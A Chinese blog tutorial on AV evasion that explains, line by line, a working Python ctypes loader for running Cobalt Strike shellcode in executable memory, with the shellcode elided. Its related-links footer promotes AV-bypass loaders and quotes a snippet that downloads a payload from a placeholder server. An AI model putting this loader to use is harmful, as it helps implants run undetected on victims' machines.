[免杀]基于python的shellcode&loader原理研究

已于 2023-10-25 15:34:26 修改
阅读量4.4k 收藏 10
点赞数 3
分类专栏: 免杀 文章标签: 安全 python web安全
于 2022-03-30 11:38:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/123842330
版权

文章目录

shellcode和loader

shellcode是一段用于利用软件漏洞而执行的代码

shellcode loader是用来运行此代码的加载器

shellcode

我们在用cs生成payload时,会生成一段特定编程语言的代码,以python为例

在这里插入图片描述

里面一长串\xfc样式的16进制代码,这就是shellcode

但光有shellcode不行,所以我们需要一个加载器loader才能让他发挥作用。

loader加载器

import ctypes



shellcode = bytearray(b'\xfc\x48.........')

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
                                          
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
                                     
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_uint64(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
ctypes库

python的ctypes模块是内建,用来调用系统动态链接库函数的模块
使用ctypes库可以很方便地调用C语言的动态链接库,并可以向其传递参数。

读取shellcode
shellcode = bytearray('\xfc\x48.........')
设置返回类型

我们需要用VirtualAlloc函数来申请内存,返回类型必须和系统位数相同
想在64位系统上运行,必须使用restype函数设置VirtualAlloc返回类型为ctypes.c_unit64,否则默认的是 32 位

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
申请内存

调用VirtualAlloc函数,来申请一块动态内存区域。
VirtualAlloc函数原型和参数如下:

LPVOID VirtualAlloc{
LPVOID lpAddress, #要分配的内存区域的地址
DWORD dwSize,      #分配的大小
DWORD flAllocationType, #分配的类型
DWORD flProtect     #该内存的初始保护属性
};

申请一块内存可读可写可执行

ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

各个参数解释

ctypes.c_int(0)是NULL,系统将会决定分配内存区域的位置,并且按64KB向上取整
ctypes.c_int(len(shellcode))以字节为单位分配或者保留多大区域
ctypes.c_int(0x3000)是 MEM_COMMIT(0x1000) 和 MEM_RESERVE(0x2000)类型的合并
ctypes.c_int(0x40)是权限为PAGE_EXECUTE_READWRITE 该区域可以执行代码,应用程序可以读写该区域。
将shellcode载入内存

调用RtlMoveMemory函数,此函数从指定内存中复制内容至另一内存里。

RtlMoveMemory函数原型和参数如下:

RtlMoveMemory(Destination,Source,Length);
Destination :指向移动目的地址的指针。
Source :指向要复制的内存地址的指针。
Length :指定要复制的字节数。

从指定内存地址将内容复制到我们申请的内存中去,shellcode字节多大就复制多大

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
创建进程

调用CreateThread将在主线程的基础上创建一个新线程

CreateThread函数原型和参数如下:

HANDLE CreateThread(
LPSECURITY_ATTRIBUTES lpThreadAttributes,#线程安全属性
SIZE_T dwStackSize,       #置初始栈的大小,以字节为单位
LPTHREAD_START_ROUTINE lpStartAddress,  #指向线程函数的指针
LPVOID lpParameter,          #向线程函数传递的参数
DWORD dwCreationFlags,       #线程创建属性
LPDWORD lpThreadId           #保存新线程的id
)

创建一个线程从shellcode放置位置开始执行

handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_uint64(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

各个参数解释

lpThreadAttributes为NULL使用默认安全性
dwStackSize为0,默认将使用与调用该函数的线程相同的栈空间大小
lpStartAddress为ctypes.c_uint64(ptr),定位到申请的内存所在的位置
lpParameter不需传递参数时为NULL
dwCreationFlags属性为0,表示创建后立即激活
lpThreadId为ctypes.pointer(ctypes.c_int(0))不想返回线程ID,设置值为NULL
等待线程结束

调用WaitForSingleObject函数用来检测线程的状态

WaitForSingleObject函数原型和参数如下:

DWORD WINAPI WaitForSingleObject(
__in HANDLE hHandle,     #对象句柄。可以指定一系列的对象
__in DWORD dwMilliseconds  #定时时间间隔
);

等待创建的线程运行结束

ctypes.windll.kernel32.WaitForSingleObject(
                                           ctypes.c_int(handle),
                                           ctypes.c_int(-1))

这里两个参数,一个是创建的线程,一个是等待时间

当线程退出时会给出一个信号,函数收到后会结束程序。

当时间设置为0或超过等待时间,程序也会结束,所以线程也会跟着结束。

正常的话我们创建的线程是需要一直运行的,所以将时间设为负数,等待时间将成为无限等待,程序就不会结束。

loader原理:申请一块内存,将shellcode写入该内存,然后开始运行该内存储存的程序,并让该程序一直运行下去。

【此身原本不知愁,最怕万一见温柔】

3tefanie丶zhou
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
lza20001103的博客
09-04 2403
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具 文章目录ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具一、声明二、测试环境三、生成Msf_Payload四、生成CobaltStrike_Payload五、加密Payload六、配置ShellCode加载器七、打包可执行程序(EXE编译环境)八、上线测试 ShellCode_Loader - Msf&amp
shellcode弹出对话框
Linux方程式
11-11 3076
功能是弹出一个对话框。本段代码在VC6.0上编译通过,此shellcode能在所有windows系统上运行且屡试不爽。  char shellcode[]= "\xfc\x68\x6a\x0a\x38\x1e\x68\x63\x89\xd1\x4f\x68\x32\x74\x91\x0c" "\x8b\xf4\x8d\x7e\xf4\x33\xdb\xb7\x04\x2b\xe3\x66\x
探索Shellcode_Loader:一款高效、灵活的Shellcode加载器
gitblog_00002的博客
04-22 595
探索Shellcode_Loader:一款高效、灵活的Shellcode加载器 项目地址:https://gitcode.com/Avienma/shellcode_loader安全研究和逆向工程领域,Shellcode是一个关键元素,它是一段可以直接由处理器执行的小型机器码程序。然而,如何安全且有效地加载这些代码并不总是那么简单。这就是Shellcode_Loader项目的用武之地。本文将带...
探索动态Shellcode加载的艺术:Shellcode Loader
gitblog_00047的博客
06-01 308
探索动态Shellcode加载的艺术:Shellcode Loader 项目地址:https://gitcode.com/ReversingID/Shellcode-Loader 项目介绍 Shellcode Loader是一个开放的资源库,专为学习如何将Shellcode动态地加载到内存中而设计。这个项目面向所有人,无论你是内部团队还是外部社区的成员,都可以从中获取关于植入物Shellcode加...
免杀笔记 ----> ShellCode Loader !!!
最新发布
huohaowen的博客
07-05 977
学了那么久的前置知识,终于到了能上线的地方了!!!不过这里还没到免杀的部分,距离bypass一众的杀毒软件还有很长的路要走!!
探索Python Shellcode Loader:一个创新的代码执行工具
gitblog_00032的博客
04-03 440
探索Python Shellcode Loader:一个创新的代码执行工具 项目地址:https://gitcode.com/HZzz2/python-shellcode-loader 项目简介 Python Shellcode Loader 是一个精心设计的开源项目,旨在为安全研究人员和开发人员提供一种便捷的方式,将Shellcode(操作系统级别的机器码)注入到Python程序中运行。通过此项...
shellcodeloader:shellcodeloader
03-11
ShellcodeLoader 语言: Windows的ShellcodeLoader可以绕过AV。 特征 它具有多种加载模式。 32位有13种加载模式,而64位有12种加载模式。 支持发展。 如果发现新的攻击手段,则可以根据指定的方法开发模板。 Shellcode是自动加密的。来自同一Shellcode的加载器的md5不同,因为生成器使用时间作为种子来随机生成128位密钥进行加密。 待办事项清单 环境:生成器使用MFC来实现UI,生成器和加载器模板使用C ++开发,并由VS2015静态编译。 方法:使用vs2015打开项目解决方案(.sln),然后进行编译。当然,您可以从下载产品。 档案文件 该工具由一个生成器(Shellcodeloader.exe)和许多加载器模板组成。 需要将不同的加载器模板放置在目录的相应目录中。 最后放在生成器相同目录下的DATA文件夹中。 如何使用 打开
pythonshellcode_loader解释
HoAd'blog
09-13 600
pythonshellcode_loader解释代码 loader传到主机执行,shellcode传到自己的服务器上。 简单的python shellcode加载器,直接上代码,注释都在代码里 代码 import ctypes import requests import base64 scode = requests.get("http://xxx.xxx.xxx.xxx/base64_python_payload.txt") shellcode = bytearray(base64.b64decod
推荐开源项目:ShellcodeLoader - 高级安全工具,让您的shellcode隐形飞行
gitblog_00065的博客
05-21 284
推荐开源项目:ShellcodeLoader - 高级安全工具,让您的shellcode隐形飞行 项目地址:https://gitcode.com/Hzllaga/ShellcodeLoader 项目介绍 ShellcodeLoader是一款创新性的开源项目,它采用先进的加密技术和反沙箱策略,使得shellcode(一种在操作系统内存中执行的机器码)能在复杂的环境中隐秘运行。通过RSA加密shel...
最新免杀360,基于shellcode字符混淆
06-22
### 最新免杀360,基于Shellcode字符混淆 #### 概述 本文将详细介绍如何利用Shellcode的字符混淆技术来实现恶意代码对反病毒软件的规避,特别是针对360安全卫士等主流安全解决方案。Shellcode作为一种小巧且功能...
ShellcodeLoader:加载shellcode或PE进行分析的小工具
05-18
ShellcodeLoader 构建ShellcodeLoader的目的是在可执行文件的上下文中快速调试在恶意软件分析中提取的Shellcode。 ShelcodeLoader的工作是从磁盘到内存读取一个常规文件,然后跳转到基址或指定的入口点以执行该文件。 它会自动检测是否正在调试,并在执行shellcode之前询问用户是否要设置断点。 在x86和x64系统中工作。 发行版 转到“发行版”选项卡并下载已编译的可执行文件。 用法 该文件是必需的。 其他参数是可选的。 ShellcodeLoader.exe [-e --entrypoint ENTRYPOINT] [-a --address ADDRESS] [-r --run] [-b --break] FILE 加载文件并以指定的偏移量执行代码 ShellcodeLoader.exe -e 1000 shellcodex86.bi
ShellLoader:轻量级的插件加载器,仅通过控制台进行通信
03-19
ShellLoader 轻量级的插件加载器,仅通过控制台进行通信
NimShellCodeLoader:使用nim编写的shellcode加载器
02-03
NimShellCodeLoader Nim编写Windows平台shellcode免杀加载器 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件拥有不同的哈希 完全针对技术研究和获得正式授权的测试活动。 ##文件组成: bin中存放生成的重组文件 encryption存储加密代码文件 module中存放c ++功能文件 安装: 1,安装nim最新版 2,下载本项目,分别编译encryption中的Tdea.nim和Caesar.nim 。 nim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 3,编译c#项目,将初始化文件放到当前目录 使用方法: 1,打开生成器 2,将有效载荷到该窗口 3,选择加载方式,点击生成,还原文件会保存到bin文件夹中 拓展: 1,新建ni
ShellcodeLoader:将shellcode用rsa加密并动态编译exe,自带多个反沙箱技术
03-19
ShellcodeLoadershellcode用rsa加密并动态编译exe,自带多个反沙箱技术。 如果要用.NET 2.0编译请手动编译,csc不支持某些代码 反沙箱 判断父进程是否为调试器 判断时间是否加速 一般沙盘内的程序时间都会加速。 判断进程是否有黑名单 判断是不是虚拟机,不过有几个vm进程是本机也会存在的,怕误报可以手动修改黑名单列表。 判断MAC地址是否有黑名单 判断是不是虚拟机的mac地址,有几个地址只要本机有装虚拟机也会有,怕误报可以手动修改黑名单。 判断系统盘是否大于50GB 一个正常的PC的系统盘都会大于50GB。 使用 一般的: 运行生成的exe文件 争论: 程序会保存加密好的数据到Output.txt shellcode.exe“私钥”“加密shellcode” 更新 20200709: 新增x86远程注入(直接复制CACTUSTORCH的) 已知问题 远程
shellload:将shellcode加载到新进程中,可以选择使用假名称
05-17
壳载 将shellcode加载到新进程中,可以选择将其隐藏在错误的进程名称下。 用法 简单的用法是将您的shellcode(十六进制编码)通过管道传输到stdin。 这将在当前的shellload进程中运行shellcode。 (提供的示例shellcode运行touch itworks命令) $ printf "6a3b589948bb2f62696e2f736800534889e7682d6300004889e652e80e000000746f756368206974776f726b730056574889e60f05" | ./shellload64 中间用法是将shellcode作为参数传递。 这会产生一个运行shellcode的后台进程。 $ ./shellload64 6a3b589948bb2f62696e2f736800534889e7682d630000488
基于python pyd的shellcode免杀绕过+源代码+文档说明
12-01
基于python pyd的免杀方式。众所周知,python是一种解释型语言,通过pyinstaller打包后,可以提取出pyc文件然后可以通过反编译器得到源代码。 但是我们可以通过将py源文件通过Cpython编译成pyd文件,然后pyinstaller...
一款基于pythonshellcode免杀加载器+源代码+文档说明
12-01
## 免杀测试 **过火绒** ![](picture/image-20231019203001783.png) **过defender** ![](picture/image-20231019204156899.png) **动态执行** ![image-20231020182032610](picture/image-20231020182032610....
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
08-03
远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1】 在网络安全领域,绕过反病毒软件(AV)的检测,即“免杀”技术,是一项重要的技能。本文将探讨如何利用Python来加载和执行shellcode,同时尽...
python shellcode免杀
06-06
Python shellcode免杀是指使用Python语言编写的shellcode可以避免被杀毒软件检测和拦截。这种技术主要是通过对shellcode进行加密、混淆、动态生成等方式来达到免杀的效果。其中,加密和混淆可以使shellcode的代码...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值